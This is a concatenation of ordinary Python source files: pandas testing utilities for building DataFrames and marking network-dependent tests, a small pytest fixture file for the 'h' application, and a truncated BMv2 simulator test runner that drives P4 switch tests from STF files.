r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples:
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
nrows,
ncols,
density=0.9,
random_state=None,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Parameters
----------
Density : float, optional
Float in (0, 1) that gives the percentage of non-missing numbers in
the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(
nrows,
ncols,
c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l,
r_ndupe_l=r_ndupe_l,
dtype=dtype,
c_idx_type=c_idx_type,
r_idx_type=r_idx_type,
)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supercedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
clear=None,
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
clear : str, default None
If not ``None`` then remove any previously raised warnings from
the ``__warningsregistry__`` to ensure that no warning messages are
suppressed by this context manager. If ``None`` is specified,
the ``__warningsregistry__`` keeps track of which warnings have been
shown, and does not show them again.
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [clear]
for m in clear:
try:
m.__warningregistry__.clear()
except AttributeError:
# module may not have __warningregistry__
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
|
conftest_disabled.py
|
import multiprocessing
from pyramid import authorization
from pyramid.testing import testConfig
import pytest
from h.script import Application, assets
def run(start, settings):
def prepare(worker):
assets(settings)
start.release()
start.acquire()
start.notify()
app = Application('development.ini', settings)
app.cfg.set('post_worker_init', prepare)
app.cfg.set('logconfig', None)
app.run()
@pytest.fixture(scope="session", autouse=True)
def server(settings):
start = multiprocessing.Condition()
start.acquire()
srv = multiprocessing.Process(target=run, args=(start, settings))
srv.daemon = True
srv.start()
start.wait()
start.release()
@pytest.fixture(scope="function", autouse=True)
def wipe(settings):
with testConfig(settings=settings) as config:
authz = authorization.ACLAuthorizationPolicy()
config.set_authorization_policy(authz)
config.include('h.api')
config.include('h.auth.local.models')
|
bmv2stf.py
|
#!/usr/bin/env python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Runs the BMv2 behavioral model simulator with input from an stf file
from __future__ import print_function
from subprocess import Popen
from threading import Thread
from glob import glob
import json
import sys
import re
import os
import stat
import tempfile
import shutil
import difflib
import subprocess
import signal
import time
import random
import errno
import socket
from string import maketrans
from collections import OrderedDict
try:
from scapy.layers.all import *
from scapy.utils import *
except ImportError:
pass
SUCCESS = 0
FAILURE = 1
class TimeoutException(Exception): pass
def signal_handler(signum, frame):
raise TimeoutException, "Timed out!"
signal.signal(signal.SIGALRM, signal_handler)
class Options(object):
def __init__(self):
self.binary = None
self.verbose = False
self.preserveTmp = False
self.observationLog = None
def nextWord(text, sep = None):
# Split a text at the indicated separator.
# Note that the separator can be a string.
# Separator is discarded.
spl = text.split(sep, 1)
if len(spl) == 0:
return '', ''
elif len(spl) == 1:
return spl[0].strip(), ''
else:
return spl[0].strip(), spl[1].strip()
def ByteToHex(byteStr):
return ''.join( [ "%02X " % ord( x ) for x in byteStr ] ).strip()
def HexToByte(hexStr):
bytes = []
hexStr = ''.join( hexStr.split(" ") )
for i in range(0, len(hexStr), 2):
bytes.append( chr( int (hexStr[i:i+2], 16 ) ) )
return ''.join( bytes )
def reportError(*message):
print("***", *message)
class Local(object):
# object to hold local vars accessable to nested functions
pass
def FindExe(dirname, exe):
dir = os.getcwd()
while len(dir) > 1:
if os.path.isdir(os.path.join(dir, dirname)):
rv = None
rv_time = 0
for dName, sdName, fList in os.walk(os.path.join(dir, dirname)):
if exe in fList:
n=os.path.join(dName, exe)
if os.path.isfile(n) and os.access(n, os.X_OK):
n_time = os.path.getmtime(n)
if n_time > rv_time:
rv = n
rv_time = n_time
if rv is not None:
return rv
dir = os.path.dirname(dir)
return exe
def run_timeout(options, args, timeout, stderr):
if options.verbose:
print("Executing ", " ".join(args))
local = Local()
local.process = None
def target():
procstderr = None
if stderr is not None:
procstderr = open(stderr, "w")
local.process = Popen(args, stderr=procstderr)
local.process.wait()
thread = Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print("Timeout ", " ".join(args), file=sys.stderr)
local.process.terminate()
thread.join()
if local.process is None:
# never even started
reportError("Process failed to start")
return -1
if options.verbose:
print("Exit code ", local.process.returncode)
return local.process.returncode
timeout = 10 * 60
class ConcurrentInteger(object):
# Generates exclusive integers in a range 0-max
# in a way which is safe across multiple processes.
# It uses a simple form of locking using folder names.
# This is necessary because this script may be invoked
# concurrently many times by make, and we need the many simulator instances
# to use different port numbers.
def __init__(self, folder, max):
self.folder = folder
self.max = max
def lockName(self, value):
return "lock_" + str(value)
def release(self, value):
os.rmdir(self.lockName(value))
def generate(self):
# try 10 times
for i in range(0, 10):
index = random.randint(0, self.max)
file = self.lockName(index)
try:
os.makedirs(file)
return index
except:
time.sleep(1)
continue
return None
class BMV2ActionArg(object):
def __init__(self, name, width):
# assert isinstance(name, str)
# assert isinstance(width, int)
self.name = name
self.width = width
class TableKey(object):
def __init__(self):
self.fields = OrderedDict()
def append(self, name, type):
self.fields[name] = type
class TableKeyInstance(object):
def __init__(self, tableKey):
assert isinstance(tableKey, TableKey)
self.values = {}
self.key = tableKey
for f,t in tableKey.fields.iteritems():
if t == "ternary":
self.values[f] = "0&&&0"
elif t == "lpm":
self.values[f] = "0/0"
elif t == "exact":
self.values[f] = "0"
elif t == "valid":
self.values[f] = "0"
else:
raise Exception("Unexpected key type " + t)
def set(self, key, value):
array = re.compile("(.*)\$([0-9]+)(.*)");
m = array.match(key)
if m:
key = m.group(1) + "[" + m.group(2) + "]" + m.group(3)
found = False
if key in self.key.fields:
found = True
elif key + '$' in self.key.fields:
key = key + '$'
found = True
elif key + '.$valid$' in self.key.fields:
key = key + '.$valid$'
found = True
elif key.endswith(".valid"):
alt = key[:-5] + "$valid$"
if alt in self.key.fields:
key = alt
found = True
if not found:
for i in self.key.fields:
if i.endswith("." + key) or i.endswith("." + key + "$"):
key = i
found = True
elif key == "valid" and i.endswith(".$valid$"):
key = i
found = True
if not found and key == "valid" and "$valid$" in self.key.fields:
key = "$valid$"
found = True
if not found:
raise Exception("Unexpected key field " + key)
if self.key.fields[key] == "ternary":
self.values[key] = self.makeMask(value)
elif self.key.fields[key] == "lpm":
self.values[key] = self.makeLpm(value)
else:
self.values[key] = value
def makeMask(self, value):
# TODO -- we really need to know the size of the key to make the mask properly,
# but to find that, we need to parse the headers and header_types from the json
if value.startswith("0x"):
mask = "F"
value = value[2:]
prefix = "0x"
elif value.startswith("0b"):
mask = "1"
value = value[2:]
prefix = "0b"
elif value.startswith("0o"):
mask = "7"
value = value[2:]
prefix = "0o"
else:
raise Exception("Decimal value "+value+" not supported for ternary key")
return value
values = "0123456789abcdefABCDEF*"
replacements = (mask * 22) + "0"
trans = maketrans(values, replacements)
m = value.translate(trans)
return prefix + value.replace("*", "0") + "&&&" + prefix + m
def makeLpm(self, value):
if value.find('/') >= 0:
return value
if value.startswith("0x"):
bits_per_digit = 4
elif value.startswith("0b"):
bits_per_digit = 1
elif value.startswith("0o"):
bits_per_digit = 3
else:
value = "0x" + hex(int(value))
bits_per_digit = 4
digits = len(value) - 2 - value.count('*')
return value.replace('*', '0') + "/" + str(digits*bits_per_digit)
def __str__(self):
result = ""
for f in self.key.fields:
if result != "":
result += " "
result += self.values[f]
return result
class BMV2ActionArguments(object):
def __init__(self, action):
assert isinstance(action, BMV2Action)
self.action = action
self.values = {}
def set(self, key, value):
found = False
for i in self.action.args:
if key == i.name:
found = True
if not found:
raise Exception("Unexpected action arg " + key)
self.values[key] = value
def __str__(self):
result = ""
for f in self.action.args:
if result != "":
result += " "
result += self.values[f.name]
return result
def size(self):
return len(self.action.args)
class BMV2Action(object):
def __init__(self, jsonAction):
self.name = jsonAction["name"]
self.args = []
for a in jsonAction["runtime_data"]:
arg = BMV2ActionArg(a["name"], a["bitwidth"])
self.args.append(arg)
def __str__(self):
return self.name
def makeArgsInstance(self):
return BMV2ActionArguments(self)
class BMV2Table(object):
def __init__(self, jsonTable):
self.match_type = jsonTable["match_type"]
self.name = jsonTable["name"]
self.key = TableKey()
self.actions = {}
for k in jsonTable["key"]:
name = k["target"]
if isinstance(name, list):
name = ""
for t in k["target"]:
if name != "":
name += "."
name += t
self.key.append(name, k["match_type"])
actions = jsonTable["actions"]
action_ids = jsonTable["action_ids"]
for i in range(0, len(actions)):
actionName = actions[i]
actionId = action_ids[i]
self.actions[actionName] = actionId
def __str__(self):
return self.name
def makeKeyInstance(self):
return TableKeyInstance(self.key)
# Represents enough about the program executed to be
# able to invoke the BMV2 simulator, create a CLI file
# and test packets in pcap files.
class RunBMV2(object):
def __init__(self, folder, options, jsonfile):
self.clifile = folder + "/cli.txt"
self.jsonfile = jsonfile
self.stffile = None
self.folder = folder
self.pcapPrefix = "pcap"
self.interfaces = {}
self.expected = {} # for each interface number of packets expected
self.expectedAny = [] # interface on which any number of packets is fine
self.packetDelay = 0
self.options = options
self.json = None
self.tables = []
self.actions = []
self.switchLogFile = "switch.log" # .txt is added by BMv2
self.readJson()
def readJson(self):
with open(self.jsonfile) as jf:
self.json = json.load(jf)
for a in self.json["actions"]:
self.actions.append(BMV2Action(a))
for t in self.json["pipelines"][0]["tables"]:
self.tables.append(BMV2Table(t))
for t in self.json["pipelines"][1]["tables"]:
self.tables.append(BMV2Table(t))
def filename(self, interface, direction):
return self.folder + "/" + self.pcapPrefix + str(interface) + "_" + direction + ".pcap"
def interface_of_filename(self, f):
return int(os.path.basename(f).rstrip('.pcap').lstrip(self.pcapPrefix).rsplit('_', 1)[0])
def do_cli_command(self, cmd):
if self.options.verbose:
print(cmd)
self.cli_stdin.write(cmd + "\n")
self.cli_stdin.flush()
self.packetDelay = 1
def do_command(self, cmd):
if self.options.verbose:
print("STF Command:", cmd)
first, cmd = nextWord(cmd)
if first == "":
pass
elif first == "add":
self.do_cli_command(self.parse_table_add(cmd))
elif first == "setdefault":
self.do_cli_command(self.parse_table_set_default(cmd))
elif first == "packet":
interface, data = nextWord(cmd)
interface = int(interface)
data = ''.join(data.split())
time.sleep(self.packetDelay)
try:
self.interfaces[interface]._write_packet(HexToByte(data))
except ValueError:
reportError("Invalid packet data", data)
return FAILURE
self.interfaces[interface].flush()
self.packetDelay = 0
elif first == "expect":
interface, data = nextWord(cmd)
interface = int(interface)
data = ''.join(data.split())
if data != '':
self.expected.setdefault(interface, []).append(data)
else:
self.expectedAny.append(interface)
else:
if self.options.verbose:
print("ignoring stf command:", first, cmd)
def parse_table_set_default(self, cmd):
tableName, cmd = nextWord(cmd)
table = self.tableByName(tableName)
actionName, cmd = nextWord(cmd, "(")
action = self.actionByName(table, actionName)
actionArgs = action.makeArgsInstance()
cmd = cmd.strip(")")
while cmd != "":
word, cmd = nextWord(cmd, ",")
k, v = nextWord(word, ":")
actionArgs.set(k, v)
command = "table_set_default " + tableName + " " + actionName
if actionArgs.size():
command += " => " + str(actionArgs)
return command
def parse_table_add(self, cmd):
tableName, cmd = nextWord(cmd)
table = self.tableByName(tableName)
key = table.makeKeyInstance()
actionArgs = None
actionName = None
prio, cmd = nextWord(cmd)
number = re.compile("[0-9]+")
if not number.match(prio):
# not a priority; push back
cmd = prio + " " + cmd
prio = ""
while cmd != "":
if actionName != None:
# parsing action arguments
word, cmd = nextWord(cmd, ",")
k, v = nextWord(word, ":")
actionArgs.set(k, v)
else:
# parsing table key
word, cmd = nextWord(cmd)
if cmd.find("=") >= 0:
# This command retrieves a handle for the key
# This feature is currently not supported, so we just ignore the handle part
cmd = cmd.split("=")[0]
if word.find("(") >= 0:
# found action
actionName, arg = nextWord(word, "(")
action = self.actionByName(table, actionName)
actionArgs = action.makeArgsInstance()
cmd = arg + cmd
cmd = cmd.strip("()")
else:
k, v = nextWord(word, ":")
key.set(k, v)
if prio != "":
# Priorities in BMV2 seem to be reversed with respect to the stf file
# Hopefully 10000 is large enough
prio = str(10000 - int(prio))
command = "table_add " + tableName + " " + actionName + " " + str(key) + " => " + str(actionArgs)
if table.match_type == "ternary":
command += " " + prio
return command
def actionByName(self, table, actionName):
id = table.actions[actionName]
action = self.actions[id]
return action
def tableByName(self, tableName):
for t in self.tables:
if t.name == tableName:
return t
raise Exception("Could not find table " + tableName)
def interfaceArgs(self):
# return list of interface names suitable for bmv2
result = []
for interface in sorted(self.interfaces):
result.append("-i " + str(interface) + "@" + self.pcapPrefix + str(interface))
return result
def generate_model_inputs(self, stffile):
self.stffile = stffile
with open(stffile) as i:
for line in i:
line, comment = nextWord(line, "#")
first, cmd = nextWord(line)
if first == "packet" or first == "expect":
interface, cmd = nextWord(cmd)
interface = int(interface)
if not interface in self.interfaces:
# Can't open the interfaces yet, as that would block
ifname = self.interfaces[interface] = self.filename(interface, "in")
os.mkfifo(ifname)
return SUCCESS
def check_switch_server_ready(self, proc, thriftPort):
"""While the process is running, we check if the Thrift server has been
started. If the Thrift server is ready, we assume that the switch was
started successfully. This is only reliable if the Thrift server is
started at the end of the init process"""
while True:
if proc.poll() is not None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
result = sock.connect_ex(("localhost", thriftPort))
if result == 0:
return True
def run(self):
if self.options.verbose:
print("Running model")
wait = 0 # Time to wait before model starts running
concurrent = ConcurrentInteger(os.getcwd(), 1000)
rand = concurrent.generate()
if rand is None:
reportError("Could not find a free port for Thrift")
return FAILURE
thriftPort = str(9090 + rand)
rv = SUCCESS
try:
os.remove("/tmp/bmv2-%d-notifications.ipc" % rand)
except OSError:
pass
try:
runswitch = [FindExe("behavioral-model", "simple_switch"),
"--log-file", self.switchLogFile, "--log-flush",
"--use-files", str(wait), "--thrift-port", thriftPort,
"--device-id", str(rand)] + self.interfaceArgs() + ["../" + self.jsonfile]
if self.options.verbose:
print("Running", " ".join(runswitch))
sw = subprocess.Popen(runswitch, cwd=self.folder)
def openInterface(ifname):
fp = self.interfaces[interface] = RawPcapWriter(ifname, linktype=0)
fp._write_header(None)
# Try to open input interfaces. Each time, we set a 2 second
# timeout. If the timeout expires we check if the bmv2 process is
# not running anymore. If it is, we check if we have exceeded the
# one minute timeout (exceeding this timeout is very unlikely and
# could mean the system is very slow for some reason). If one of the
# 2 conditions above is met, the test is considered a FAILURE.
start = time.time()
sw_timeout = 60
# open input interfaces
# DANGER -- it is critical that we open these fifos in the same
# order as bmv2, as otherwise we'll deadlock. Would be nice if we
# could open nonblocking.
for interface in sorted(self.interfaces):
ifname = self.interfaces[interface]
while True:
try:
signal.alarm(2)
openInterface(ifname)
signal.alarm(0)
except TimeoutException:
if time.time() - start > sw_timeout:
return FAILURE
if sw.poll() is not None:
return FAILURE
else:
break
# at this point we wait until the Thrift server is ready
# also useful if there are no interfaces
try:
signal.alarm(int(sw_timeout + start - time.time()))
self.check_switch_server_ready(sw, int(thriftPort))
signal.alarm(0)
except TimeoutException:
return FAILURE
time.sleep(0.1)
runcli = [FindExe("behavioral-model", "simple_switch_CLI"), "--thrift-port", thriftPort]
if self.options.verbose:
print("Running", " ".join(runcli))
cli = subprocess.Popen(runcli, cwd=self.folder, stdin=subprocess.PIPE)
self.cli_stdin = cli.stdin
with open(self.stffile) as i:
for line in i:
line, comment = nextWord(line, "#")
